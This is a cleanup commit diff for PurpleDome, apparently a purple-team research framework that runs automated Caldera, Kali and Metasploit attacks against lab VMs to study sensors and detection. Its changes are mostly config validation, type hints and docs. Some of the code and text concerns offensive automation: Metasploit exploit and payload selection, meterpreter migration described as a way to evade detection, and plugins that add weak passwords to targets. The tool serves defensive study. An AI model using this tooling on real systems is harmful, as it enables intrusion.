Merge pull request #14 from avast/cleanup

Cleanup
pull/17/head
Thorsten Sick 3 years ago committed by GitHub
commit a93c92bbf4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -6,6 +6,7 @@
test: tox.ini
tox;
pylint --rcfile=pylint.rc *.py app/*.py plugins/base/*.py
coverage html;
coverage report;
@ -18,6 +19,7 @@ shipit: test
pylint:
pylint --rcfile=pylint.rc *.py app/*.py plugins/base/*.py
# Testing if types are used properly
mypy:
mypy --strict-optional app/

@ -2,6 +2,7 @@
""" Logger for the attack side. Output must be flexible, because we want to be able to feed it into many different processes. From ML to analysts """
from inspect import currentframe, getsourcefile
import json
import datetime
from random import randint
@ -29,10 +30,9 @@ class AttackLog():
@param verbosity: verbosity setting from 0 to 3 for stdout printing
"""
self.log: list[dict] = []
self.machines: dict = []
self.machines: list[dict] = []
self.verbosity = verbosity
# TODO. As soon as someone wants custom timestamps, make the format variable
self.datetime_format = "%H:%M:%S.%f"
def __add_to_log__(self, item: dict):
@ -75,7 +75,6 @@ class AttackLog():
""" Returns the default tactics for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "System Owner/User Discovery",
"697e8a432031075e47cccba24417013d": "Persistence",
"f39161b2fa5d692ebe3972e0680a8f97": "Persistence",
"16e6823c4656f5cd155051f5f1e5d6ad": "Persistence",
"443b853ac50a79fc4a85354cb2c90fa2": "Persistence",
@ -84,7 +83,11 @@ class AttackLog():
"697e8a432031075e47cccba24417013d": "Persistence"}
ttp_data = {"t1547": "Persistence",
"t1547.001": "Persistence"}
"t1547.001": "Persistence",
"t1547.004": "Persistence",
"t1547.005": "Persistence",
"t1547.009": "Persistence",
"t1547.010": "Persistence"}
if ability_id in data:
return data[ability_id]
@ -99,7 +102,6 @@ class AttackLog():
""" Returns the default name for this ability based on a db """
data = {"bd527b63-9f9e-46e0-9816-b8434d2b8989": "T1033",
"697e8a432031075e47cccba24417013d": "TA0003",
"f39161b2fa5d692ebe3972e0680a8f97": "TA0003",
"16e6823c4656f5cd155051f5f1e5d6ad": "TA0003",
"443b853ac50a79fc4a85354cb2c90fa2": "TA0003",
@ -108,7 +110,11 @@ class AttackLog():
"697e8a432031075e47cccba24417013d": "TA0003"}
ttp_data = {"t1547": "TA0003",
"t1547.001": "TA0003"}
"t1547.001": "TA0003",
"t1547.004": "TA0003",
"t1547.005": "TA0003",
"t1547.009": "TA0003",
"t1547.010": "TA0003"}
if ability_id in data:
return data[ability_id]
@ -503,6 +509,8 @@ class AttackLog():
timestamp = self.__get_timestamp__()
logid = timestamp + "_" + str(randint(1, 100000))
cframe = currentframe()
data = {"timestamp": timestamp,
"timestamp_end": None,
"event": "start",
@ -519,7 +527,9 @@ class AttackLog():
"description": kwargs.get("description", None), # Generic description for this attack. Set by the attack
"situation_description": kwargs.get("situation_description", None), # Description for the situation this attack was run in. Set by the plugin or attacker emulation
"countermeasure": kwargs.get("countermeasure", None), # Set by the attack
"result": None
"result": None,
"sourcefile": kwargs.get("sourcefile", getsourcefile(cframe.f_back)),
"sourceline": kwargs.get("sourceline", cframe.f_back.f_lineno)
}
self.__add_to_log__(data)
@ -633,7 +643,7 @@ class AttackLog():
return res
def add_machine_info(self, machine_info):
def add_machine_info(self, machine_info: dict):
""" Adds a dict with machine info. One machine per call of this method """
self.machines.append(machine_info)

@ -4,6 +4,7 @@
from typing import Optional
import yaml
from app.config_verifier import MainConfig
from app.exceptions import ConfigurationError
@ -18,7 +19,7 @@ from app.exceptions import ConfigurationError
class MachineConfig():
""" Sub config for a specific machine"""
def __init__(self, machinedata: dict):
def __init__(self, machinedata):
""" Init machine control config
@param machinedata: dict containing machine data
@ -27,53 +28,46 @@ class MachineConfig():
raise ConfigurationError
self.raw_config = machinedata
self.verify()
def verify(self):
""" Verify essential data is present """
try:
self.vmname()
operating_system = self.os()
vmcontroller = self.vmcontroller()
except KeyError as exception:
raise ConfigurationError from exception
if operating_system not in ["linux", "windows"]:
raise ConfigurationError
# TODO: Verify with plugins
if vmcontroller not in ["vagrant", "running_vm"]:
raise ConfigurationError
def vmname(self) -> str:
""" Returns the vmname """
return self.raw_config["vm_name"]
return self.raw_config.vm_name
def get_nicknames(self) -> list[str]:
""" Gets the nicknames """
if "nicknames" in self.raw_config:
return self.raw_config["nicknames"] or []
if self.raw_config.has_key("nicknames"):
return self.raw_config.nicknames or []
return []
def vmcontroller(self) -> str:
""" Returns the vm controller. lowercase """
return self.raw_config["vm_controller"]["type"].lower()
if not self.raw_config.has_key("vm_controller"):
raise ConfigurationError
return self.raw_config.vm_controller.vm_type.lower()
def vm_ip(self) -> str:
""" Return the configured ip/domain name (whatever is needed to reach the machine). Returns None if missing """
if not self.raw_config.has_key("vm_controller"):
return self.vmname()
if not self.raw_config.vm_controller.has_key("ip"):
return self.vmname()
try:
return self.raw_config["vm_controller"]["ip"]
return self.raw_config.vm_controller.ip
except KeyError:
return self.vmname()
def os(self) -> str: # pylint: disable=invalid-name
""" returns the os. lowercase """
return self.raw_config["os"].lower()
return self.raw_config.os.lower()
def use_existing_machine(self) -> bool:
""" Returns if we want to use the existing machine """
@ -83,7 +77,10 @@ class MachineConfig():
def machinepath(self) -> str:
""" Returns the machine path. If not configured it will fall back to the vm_name """
return self.raw_config.get("machinepath", self.vmname())
if self.raw_config.has_key("machinepath"):
return self.raw_config.machinepath
return self.vmname()
def get_playground(self) -> Optional[str]:
""" Returns the machine specific playground where all the implants and tools will be installed """
@ -123,20 +120,20 @@ class MachineConfig():
def vagrantfilepath(self) -> str:
""" Vagrant specific config: The vagrant file path """
if "vagrantfilepath" not in self.raw_config["vm_controller"]:
if not self.raw_config.vm_controller.has_key("vagrantfilepath"):
raise ConfigurationError("Vagrantfilepath missing")
return self.raw_config["vm_controller"]["vagrantfilepath"]
return self.raw_config.vm_controller.vagrantfilepath
def sensors(self) -> list[str]:
""" Return a list of sensors configured for this machine """
if "sensors" in self.raw_config:
return self.raw_config["sensors"] or []
if self.raw_config.has_key("sensors"):
return self.raw_config.sensors or []
return []
def vulnerabilities(self) -> list[str]:
""" Return a list of vulnerabilities configured for this machine """
if "vulnerabilities" in self.raw_config:
return self.raw_config["vulnerabilities"] or []
if self.raw_config.has_key("vulnerabilities"):
return self.raw_config.vulnerabilities or []
return []
def is_active(self) -> bool:
@ -154,7 +151,7 @@ class ExperimentConfig():
@param configfile: The configuration file to process
"""
self.raw_config: Optional[dict] = None
self.raw_config: MainConfig = None
self._targets: list[MachineConfig] = []
self._attackers: list[MachineConfig] = []
self.load(configfile)
@ -169,22 +166,25 @@ class ExperimentConfig():
"""
with open(configfile) as fh:
self.raw_config = yaml.safe_load(fh)
data = yaml.safe_load(fh)
if self.raw_config is None:
if data is None:
raise ConfigurationError("Config file is empty")
self.raw_config = MainConfig(**data)
# Process targets
if self.raw_config["targets"] is None:
if self.raw_config.targets is None:
raise ConfigurationError("Config file does not specify targets")
for target in self.raw_config["targets"]:
self._targets.append(MachineConfig(self.raw_config["targets"][target]))
for target in self.raw_config.targets:
self._targets.append(MachineConfig(target))
# Process attackers
if self.raw_config["attackers"] is None:
if self.raw_config.attackers is None:
raise ConfigurationError("Config file does not specify attackers")
for attacker in self.raw_config["attackers"]:
self._attackers.append(MachineConfig(self.raw_config["attackers"][attacker]))
for attacker in self.raw_config.attackers:
self._attackers.append(MachineConfig(attacker))
def targets(self) -> list[MachineConfig]:
""" Return config for targets as MachineConfig objects """
@ -210,7 +210,7 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
return self.raw_config["caldera"]["apikey"]
return self.raw_config.caldera.apikey
def loot_dir(self) -> str:
""" Returns the loot dir """
@ -218,10 +218,8 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "results" not in self.raw_config or self.raw_config["results"] is None:
raise ConfigurationError("results missing in configuration")
try:
res = self.raw_config["results"]["loot_dir"]
res = self.raw_config.results.loot_dir
except KeyError as error:
raise ConfigurationError("results/loot_dir not properly set in configuration") from error
return res
@ -234,10 +232,9 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if self.raw_config["attack_conf"] is None:
raise ConfigurationError("Config file missing attacks")
try:
res = self.raw_config["attack_conf"][attack]
res = self.raw_config.attack_conf[attack]
except KeyError:
res = {}
if res is None:
@ -252,10 +249,9 @@ class ExperimentConfig():
raise ConfigurationError("Config file is empty")
try:
res = self.raw_config["caldera_conf"]["obfuscator"]
return self.raw_config.attacks.caldera_obfuscator
except KeyError:
return "plain-text"
return res
def get_caldera_jitter(self) -> str:
""" Get the caldera configuration. In this case: Jitter. Will default to 4/8 """
@ -264,10 +260,9 @@ class ExperimentConfig():
raise ConfigurationError("Config file is empty")
try:
res = self.raw_config["caldera_conf"]["jitter"]
return self.raw_config.attacks.caldera_jitter
except KeyError:
return "4/8"
return res
def get_plugin_based_attacks(self, for_os: str) -> list[str]:
""" Get the configured kali attacks to run for a specific OS
@ -278,11 +273,11 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "plugin_based_attacks" not in self.raw_config:
if not self.raw_config.has_key("plugin_based_attacks"):
return []
if for_os not in self.raw_config["plugin_based_attacks"]:
if not self.raw_config.plugin_based_attacks.has_key(for_os):
return []
res = self.raw_config["plugin_based_attacks"][for_os]
res = self.raw_config.plugin_based_attacks.get(for_os)
if res is None:
return []
return res
@ -296,11 +291,11 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "caldera_attacks" not in self.raw_config:
if not self.raw_config.has_key("caldera_attacks"):
return []
if for_os not in self.raw_config["caldera_attacks"]:
if not self.raw_config.caldera_attacks.has_key(for_os):
return []
res = self.raw_config["caldera_attacks"][for_os]
res = self.raw_config.caldera_attacks.get(for_os)
if res is None:
return []
return res
@ -312,7 +307,7 @@ class ExperimentConfig():
raise ConfigurationError("Config file is empty")
try:
return int(self.raw_config["attacks"]["nap_time"])
return int(self.raw_config.attacks.nap_time)
except KeyError:
return 0
@ -325,11 +320,9 @@ class ExperimentConfig():
if self.raw_config is None:
raise ConfigurationError("Config file is empty")
if "sensors" not in self.raw_config:
return {}
if self.raw_config["sensors"] is None: # Better for unit tests that way.
if self.raw_config.sensor_conf is None: # Better for unit tests that way.
return {}
if name in self.raw_config["sensors"]:
return self.raw_config["sensors"][name]
if name in self.raw_config.sensor_conf:
return self.raw_config.sensor_conf[name]
return {}

@ -0,0 +1,205 @@
#!/usr/bin/env python3
""" Pydantic verifier for config structure """
from enum import Enum
from typing import Optional
from pydantic.dataclasses import dataclass
from pydantic import conlist # pylint: disable=no-name-in-module
# TODO: Move from has_key to iterators and "is in"
class OSEnum(str, Enum):
""" List of all supported OS-es """
LINUX = "linux"
WINDOWS = "windows"
class VMControllerTypeEnum(str, Enum):
""" List of all supported controlled plugins. This is only done for VM controller plugins !
I do not expect many new ones. And typos in config can be a waste of time. Let's see if I am right. """
VAGRANT = "vagrant"
RUNNING_VM = "running_vm"
@dataclass
class CalderaConfig:
""" Configuration for the Caldera server """
apikey: str
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
@dataclass
class VMController:
""" Configuration for the VM controller """
vm_type: VMControllerTypeEnum
vagrantfilepath: str
ip: Optional[str] = "" # pylint: disable=invalid-name
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
# def __dict__(self):
# return {"vm_type": self.vm_type,
# "vagrantfilepath": self.vagrantfilepath,
# "ip": self.ip}
@dataclass
class Attacker:
""" Configuration for a attacker VM """
name: str
vm_controller: VMController
vm_name: str
nicknames: Optional[list[str]]
machinepath: str
os: OSEnum # pylint: disable=invalid-name
use_existing_machine: bool = False
playground: Optional[str] = None
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
def get(self, keyname, default=None):
""" Returns the value of a specific key
Required for compatibility with DotMap which is used in Unit tests
"""
if self.has_key(keyname):
return self.__dict__[keyname]
return default
@dataclass
class Target:
""" Configuration for a target VM """
name: str
vm_controller: VMController
vm_name: str
os: OSEnum # pylint: disable=invalid-name
paw: str
group: str
machinepath: str
sensors: Optional[list[str]]
nicknames: Optional[list[str]]
active: bool = True
use_existing_machine: bool = False
playground: Optional[str] = None
halt_needs_force: Optional[str] = None
ssh_user: Optional[str] = None
ssh_password: Optional[str] = None
ssh_keyfile: Optional[str] = None
vulnerabilities: list[str] = None
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
def get(self, keyname, default=None):
""" Returns the value of a specific key
Required for compatibility with DotMap which is used in Unit tests
"""
if self.has_key(keyname):
return self.__dict__[keyname]
return default
@dataclass
class AttackConfig:
""" Generic configuration for attacks """
caldera_obfuscator: str = "plain-text"
caldera_jitter: str = "4/8"
nap_time: int = 5
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
@dataclass
class AttackList:
""" A list of attacks to run. Either plugin based or caldera based """
linux: Optional[list[str]]
windows: Optional[list[str]]
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
def get(self, keyname, default=None):
""" Returns the value of a specific key
Required for compatibility with DotMap which is used in Unit tests
"""
if self.has_key(keyname):
return self.__dict__[keyname]
return default
@dataclass
class Results:
""" What to do with the results """
loot_dir: str
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
@dataclass
class MainConfig:
""" Central configuration for PurpleDome """
caldera: CalderaConfig
attackers: conlist(Attacker, min_items=1)
targets: conlist(Target, min_items=1)
attacks: AttackConfig
caldera_attacks: AttackList
plugin_based_attacks: AttackList
results: Results
# Free form configuration for plugins
attack_conf: Optional[dict]
sensor_conf: Optional[dict]
def has_key(self, keyname):
""" Checks if a key exists
Required for compatibility with DotMap which is used in Unit tests
"""
if keyname in self.__dict__.keys():
return True
return False
# TODO: Check for name duplication

@ -14,6 +14,11 @@ class DocGenerator():
self.outfile = None
def generate(self, jfile, outfile="tools/human_readable_documentation/source/contents.rst"):
""" Generates human readable documentation out of a template.
@param jfile: json attack log created by PurpleDome as data source
@param outfile: rst file to write. Can be compiled into pdf using sphinx
"""
self.outfile = outfile

@ -8,6 +8,7 @@ import time
import zipfile
import shutil
from datetime import datetime
from typing import Optional
from app.attack_log import AttackLog
from app.config import ExperimentConfig
@ -32,12 +33,14 @@ class Experiment():
@param verbosity: verbosity level between 0 and 3
@param caldera_attacks: an optional argument to override caldera attacks in the config file and run just this one caldera attack. A list of caldera ID
"""
self.attacker_1 = None
self.attacker_1: Optional[Machine] = None
self.experiment_config = ExperimentConfig(configfile)
self.attack_logger = AttackLog(verbosity)
self.plugin_manager = PluginManager(self.attack_logger)
self.__start_attacker()
if self.attacker_1 is None:
raise ServerError
caldera_url = "http://" + self.attacker_1.get_ip() + ":8888"
self.caldera_control = CalderaControl(caldera_url, attack_logger=self.attack_logger, config=self.experiment_config)
# self.caldera_control = CalderaControl("http://" + self.attacker_1.get_ip() + ":8888", self.attack_logger,
@ -279,18 +282,18 @@ class Experiment():
defaultname = os.path.join(self.lootdir, "..", "most_recent.zip")
shutil.copyfile(filename, defaultname)
@staticmethod
def __get_results_files(root):
""" Yields a list of potential result files
# @staticmethod
# def __get_results_files(root):
# """ Yields a list of potential result files
@param root: Root dir of the machine to collect data from
"""
# TODO: Properly implement. Get proper root parameter
# @param root: Root dir of the machine to collect data from
# """
# # TODO: Properly implement. Get proper root parameter
total = [os.path.join(root, "logstash", "filebeat.json")]
for a_file in total:
if os.path.exists(a_file):
yield a_file
# total = [os.path.join(root, "logstash", "filebeat.json")]
# for a_file in total:
# if os.path.exists(a_file):
# yield a_file
# def __clean_result_files(self, root):
# """ Deletes result files

@ -54,7 +54,7 @@ class Metasploit():
exp = self.get_client().modules.use('exploit', exploit)
# print(exploit.description)
# print(exploit.missing_required)
pl = self.get_client().modules.use('payload', payload)
pl = self.get_client().modules.use('payload', payload) # pylint: disable=invalid-name
# print(payload.description)
# print(payload.missing_required)
if lhost is None:
@ -208,7 +208,7 @@ class Metasploit():
if payload_type is None:
raise MetasploitError("Payload not defined")
try:
ip = socket.gethostbyname(self.attacker.get_ip())
ip = socket.gethostbyname(self.attacker.get_ip()) # pylint: disable=invalid-name
self.start_exploit_stub_for_external_payload(payload_type, lhost=kwargs.get("lhost", ip))
self.wait_for_session(2)
except MetasploitError:
@ -459,7 +459,7 @@ class MetasploitInstant(Metasploit):
description = "Migrating to another process can escalate privileges, move the meterpreter to a long running process or evade detection. For that the Meterpreter stub is injected into another process and the new stub then connects to the Metasploit server instead of the old one."
process_list = self.ps_process_discovery(target)
ps = self.parse_ps(process_list[0])
ps = self.parse_ps(process_list[0]) # pylint: disable=invalid-name
filtered_list = self.filter_ps_results(ps, user, name, arch)
if len(filtered_list) == 0:

@ -3,12 +3,17 @@
from glob import glob
import os
import re
from typing import Optional
import straight.plugin # type: ignore
from plugins.base.plugin_base import BasePlugin
from plugins.base.attack import AttackPlugin
from plugins.base.machinery import MachineryPlugin
from plugins.base.ssh_features import SSHFeatures
from plugins.base.sensor import SensorPlugin
from plugins.base.vulnerability_plugin import VulnerabilityPlugin
from app.interface_sfx import CommandlineColors
from app.attack_log import AttackLog
@ -29,15 +34,19 @@ sections = [{"name": "Vulnerabilities",
class PluginManager():
""" Manage plugins """
def __init__(self, attack_logger: AttackLog):
def __init__(self, attack_logger: AttackLog, basedir: Optional[str] = None):
"""
@param attack_logger: The attack logger to use
@param basedir: optional base directory for plugins. A glob
"""
self.base = "plugins/**/*.py"
if basedir is None:
self.base = "plugins/**/*.py"
else:
self.base = basedir
self.attack_logger = attack_logger
def get_plugins(self, subclass, name_filter=None) -> list[BasePlugin]:
def get_plugins(self, subclass, name_filter: Optional[list[str]] = None) -> list[BasePlugin]:
""" Returns a list plugins matching specified criteria
@ -110,6 +119,29 @@ class PluginManager():
print(f"Description: {plugin.get_description()}")
print("\t")
def is_ttp_wrong(self, ttp):
""" Checks if a ttp is a valid ttp """
if ttp is None:
return True
# Short: T1234
if re.match("^T\\d{4}$", ttp):
return False
# Detailed: T1234.123
if re.match("^T\\d{4}\\.\\d{3}$", ttp):
return False
# Unkown: ???
if ttp == "???":
return False
# Multiple TTPs in this attack
if ttp == "multiple":
return False
return True
def check(self, plugin):
""" Checks a plugin for valid implementation
@ -118,6 +150,16 @@ class PluginManager():
issues = []
# Base functionality for all plugin types
if plugin.name is None:
report = f"No name for plugin: in {plugin.plugin_path}"
issues.append(report)
if plugin.description is None:
report = f"No description in plugin: {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
# Sensors
if issubclass(type(plugin), SensorPlugin):
# essential methods: collect
@ -131,6 +173,9 @@ class PluginManager():
if plugin.run.__func__ is AttackPlugin.run:
report = f"Method 'run' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if self.is_ttp_wrong(plugin.ttp):
report = f"Attack plugins need a valid ttp number (either T1234, T1234.222 or ???) {plugin.get_name()} uses {plugin.ttp} in {plugin.plugin_path}"
issues.append(report)
# Machinery
if issubclass(type(plugin), MachineryPlugin):
@ -138,7 +183,7 @@ class PluginManager():
if plugin.get_state.__func__ is MachineryPlugin.get_state:
report = f"Method 'get_state' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.get_ip.__func__ is MachineryPlugin.get_ip:
if (plugin.get_ip.__func__ is MachineryPlugin.get_ip) or (plugin.get_ip.__func__ is SSHFeatures.get_ip):
report = f"Method 'get_ip' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if plugin.up.__func__ is MachineryPlugin.up:
@ -163,6 +208,9 @@ class PluginManager():
if plugin.stop.__func__ is VulnerabilityPlugin.stop:
report = f"Method 'stop' not implemented in {plugin.get_name()} in {plugin.plugin_path}"
issues.append(report)
if self.is_ttp_wrong(plugin.ttp):
report = f"Vulnerability plugins need a valid ttp number (either T1234, T1234.222 or ???) {plugin.get_name()} uses {plugin.ttp} in {plugin.plugin_path}"
issues.append(report)
return issues
@ -217,8 +265,7 @@ class PluginManager():
if section["name"] == subclass_name:
subclass = section["subclass"]
if subclass is None:
print("Use proper subclass. Available subclasses are: ")
"\n- ".join(list(sections["name"]))
print("Use proper subclass")
plugins = self.get_plugins(subclass, [name])
for plugin in plugins:

@ -2,11 +2,29 @@
Basics
======
Purple Dome is a simulated and automated environment to experiment with several operating system attacking each other.
Purple Dome is a simulated and automated environment to experiment with hacking - and defense.
This tool generates an attacker VM and target VMs. Automated attacks are then run against the targets and they will log system events. Those logs will then be stored away for analysis.
PurpleDome is relevant for you:
Attacks are started from the attacker VM which is normally a Kali linux machine (with all the Kali tools) running a Caldera server for additional tooling.
* If you develop sensors for bolt on security
* If you want to test detection logic for your bolt on security
* If you want to stress test mitigation around your vulnerable apps
* Experiment with hardening your OS or software
* Want to forensically analyse a system after an attack
* Do some blue team exercises
* Want to train ML on data from real attacks
PurpleDome simulates a small busniess network. It generates an attacker VM and target VMs. Automated attacks are then run against the targets.
Depending on which sensors you picked you will get their logs. And the logs from the attacks. Perfect to compare them side-by-side.
Attacks are written as small plugins and control pre-installed tools:
* Kali command line tools
* Caldera commands
* Metasploit
That way your experiments focus on behaviour detection. And not on whack-a-mole games with malware samples.
-------------------
@ -23,11 +41,12 @@ Features
* Metasploit attacks
* Data collection: Attack log and sensor data in parallel with timestamps for matching events
* Vulnerability plugins: Modify the targets before the attack
* Sensor plugins: Write a simple wrapper around your sensor and integrate it into the experiments
Components
==========
The command line tools are the way you will interact with Purple Dome the most. Those are described in the *CLI* chapter.
The command line tools are the way you will interact with Purple Dome. Those are described in the *CLI* chapter.
The experiments are configured in YAML files, the format is described in the *configuration* chapter. You will also want to create some target VMs. You can do this manually or use Vagrant. Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter.

@ -9,14 +9,25 @@ To define the VMs there are also *Vagrantfiles* and associated scripts. The exam
Machines
========
Machines (targets and attacker) are configured in *experiment.yaml* - the default config file. There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it per machine.
Machines (targets and attacker) are configured in an experiment specific yaml file (default is: *experiment.yaml*). There are different kinds of VM controllers and different communication interfaces. You will have to pick one and configure it per machine.
If you use the VM controller "vagrant" you will also have to create a Vagrantfile and link to the folder containing it.
SSH
---
SSH is the default communication interfaces. If you use Linux and Vagrant Purple Dome can use vagrant to establish SSH communication. For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified.
SSH is the default communication interfaces. If you use Linux and Vagrant Purple Dome can use vagrant to establish SSH communication. For Windows - which needs OpenSSH installed - the configuration needs the proper keyfile specified. And you will have to manually install SSH on the windows target.
Vulnerabilities
===============
You can install vulnerabilities and weaknesses in the targets to allow your attacks to succeed (and generating more data that way). Vulnerabilities are implemented as plugins and listed by name in each machine.
Sensors
=======
Each machine can have a list of sensors to run on it. In addition there is the global *sensor_conf* setting to configure the sensors.
Sensors are implemented as plugins.
Attacks
=======
@ -28,19 +39,42 @@ Caldera attacks (called abilities) are identified by a unique ID. Some abilities
All Caldera abilities are available. As some will need parameters and Caldera does not offer the option to configure those in the YAML, some caldera attacks might not work without implementing a plugin.
kali_attacks
------------
In the YAML file you will find two sub-categories under caldera_attacks: linux and windows. There you just list the ids of the caldera attacks to run on those systems.
plugin_based_attacks
--------------------
Kali attacks are kali commandline tools run. Those are executed by specific Purple Dome plugins. Only Kali tools dupported by a plugin are available. You can reference them by the plugin name.
Kali attacks are kali commandline tools run. Metasploit attacks are metasploit steps to run against the target. Both are executed by specific Purple Dome plugins. You can reference them by the plugin name.
kali_conf
---------
In the YAML file you will find two sub-categories under plugin_based_attacks: linux and windows. There you just list the plugin names to run on those systems.
All kali attacks can have a special configuration. The configuration is attack tool specific.
attack_conf
-----------
All plugin based attacks can use configuration. This is in plugin-name sub categories in here.
Example config file
===================
The example defines four machines:
* A kali attacker
And three targets
* target1 (an old Linux, Ubuntu managed)
* target2 (Vagrant managed Windows. Pre installed)
* target3 (Ubuntu 20.10, Created by Vagrant)
It also defines the pre-installed sensors and the vulnerabilities active on each machine.
Next it sets the attack configuration (nap time between attacks and similar) and specifies which attacks to run against which targets.
* plugin_based_attacks
* caldera_attacks
For the plugins it has plugin specific configuration in *sensor_conf* and *attack_conf*
.. autoyaml:: ../template.yaml

@ -41,6 +41,11 @@ extensions += ['sphinx_pyreverse']
extensions += ['sphinxcontrib.autoyaml']
autoyaml_level = 5
# Pydantic plugin for sphinx. Another way to generate config documentation
# extensions += ['sphinx-pydantic']
# This has bugs and is not properly maintained
# But would be awesome: https://sphinx-pydantic.readthedocs.io/en/latest/
# Properly display command line behaviour https://pypi.org/project/sphinxcontrib.asciinema/
# https://github.com/divi255/sphinxcontrib.asciinema/issues/11
extensions += ['sphinxcontrib.asciinema']

@ -3,7 +3,7 @@ Attack plugins
**************
Attack features of PurpleDome can be extended using a plugin system. Those attack plugins can start Caldera ttacks, run Kali command line tools ir use Metasploit.
Attack features of PurpleDome can be extended using a plugin system. Those attack plugins can start Caldera attacks, run Kali command line tools or use Metasploit.
An example plugin is in the file *hydra_plugin.py*. It contains a plugin class that **MUST** be based on the *AttackPlugin* class.
@ -30,7 +30,7 @@ The boilerplate contains some basics:
* name: a unique name, also used in the config yaml file to reference this plugin
* description: A human readable description for this plugin.
* ttp: The TTP number of this kali attack. See https://attack.mitre.org/
* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ "???" if it is unknown "multiple" if it covers several TTPs
* references. A list of urls to blog posts or similar describing the attack
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Better than using required_files is to use:

@ -2,6 +2,8 @@
Extending the documentation
===========================
The documentation is Sphinx based.
Tools being used for documentation are:

@ -5,15 +5,16 @@ Extending
Modules
=======
Several core module create the system.
Several core module create the system. They are in the *app* folder
* CalderaControl: remote control for Caldera using the Caldera REST API
* Metasploit: Metasploit control
* MachineControl: Create/start and stop VMs
* ExperimentControl: Control experiments. Will internally use the modules already mentioned
* PluginManager: Plugin manager tasks
* MachineConfig / ExperimentConfig: Reading and processing configuration files
* AttackLog: Logging attack steps and output to stdio
* experimentcontrol: Control experiments. This is the central control for everything
* calderacontrol: remote control for Caldera using the Caldera REST API
* metasploit: Metasploit control. Simplifies the basic attack step so they can be used from plugins
* machinecontrol: Create/start and stop VMs. Will call the machinery plugin
* pluginmanager: Plugin manager tasks. Has methods to verify plugin quality as well
* config: Reading and processing configuration files
* attacklog: Logging attack steps and output to stdio
* doc_generator: Generates human readable documents from attack logs
--------------
@ -26,7 +27,7 @@ Class for Caldera communication
:members:
----------
MetaSploit
Metasploit
----------
Class for Metasploit automation
@ -34,6 +35,15 @@ Class for Metasploit automation
.. autoclass:: app.metasploit.Metasploit
:members:
-----------------
MetasploitInstant
-----------------
Extends. In addition to the communication features from the superclass Metasploit it simplifies basic commands.
.. autoclass:: app.metasploit.MetasploitInstant
:members:
--------
MSFVenom
--------

@ -2,7 +2,9 @@
Sensor plugins
**************
To experiment with different senors installed on the targets there is the sensor plugin. It contains a plugin class that **MUST** be based on the *SensorPlugin* class.
To experiment with different sensors installed on the targets there is the sensor plugin. It contains a plugin class that **MUST** be based on the *SensorPlugin* class.
The main goal of PurpleDome is to study sensor technology, which data they can collect and how to create an accurate picture of what happens during an attack. So this can be one of the most important plugin classes to extend.
Usage
=====
@ -11,7 +13,7 @@ To create a new plugin, start a sub-folder in plugins. The python file in there
If the plugin is activated for a specific machine specific methods will be called to interact with the target:
* prime: Easrly installation steps, can trigger a reboot of the machine by returning True
* prime: Easly installation steps, can trigger a reboot of the machine by returning True
* install: Normal, simple installation. No reboot
* start: Start the sensor
* stop: Stop the sensor
@ -29,9 +31,8 @@ The boilerplate contains some basics:
Additionally you can set *self.debugit* to True. This will run the sensor on execution in gdb and make the call blocking. So you can debug your sensor.
The plugin class
================
The sensor plugin class
=======================
.. autoclass:: plugins.base.sensor.SensorPlugin
:members:

@ -2,7 +2,7 @@
VM Controller plugins
*********************
The experiment being run handles the machines. As there can be several VM controllers being used this is handled by the plugin layer as well. Those machines can be target or attack machines.
The experiment being run handles the machines. Those machines can be targets or attacker machines. Different types of machine controllers are covered by those plugins.
A VM plugin handles several things:
@ -32,12 +32,27 @@ The boilerplate contains some basics:
* description. A human readable description for this plugin.
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Some relevant methods are
Some relevant methods that must be implemented (even if they will not contain code) are:
process_config
--------------
up
--
The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults
Starts the machine
create
------
Creates the machine. Vagrant for example can create machines based on config files.
halt
----
Stop the machine
destroy
-------
Destroy the machine
get_state
---------
@ -52,7 +67,6 @@ Get the ip of the machine. If the machine is registered at the system resolver (
The plugin class
================
The machine class can also be very essential if you write attack plugins. Those have access to the kali attack and one or more targets. And those are Machinery objects.
For a full list of methods read on:
.. autoclass:: plugins.base.machinery.MachineryPlugin

@ -2,7 +2,9 @@
Vulnerability plugins
*********************
To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added to the system. You get the idea.
For an attack leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added to the system. You get the idea.
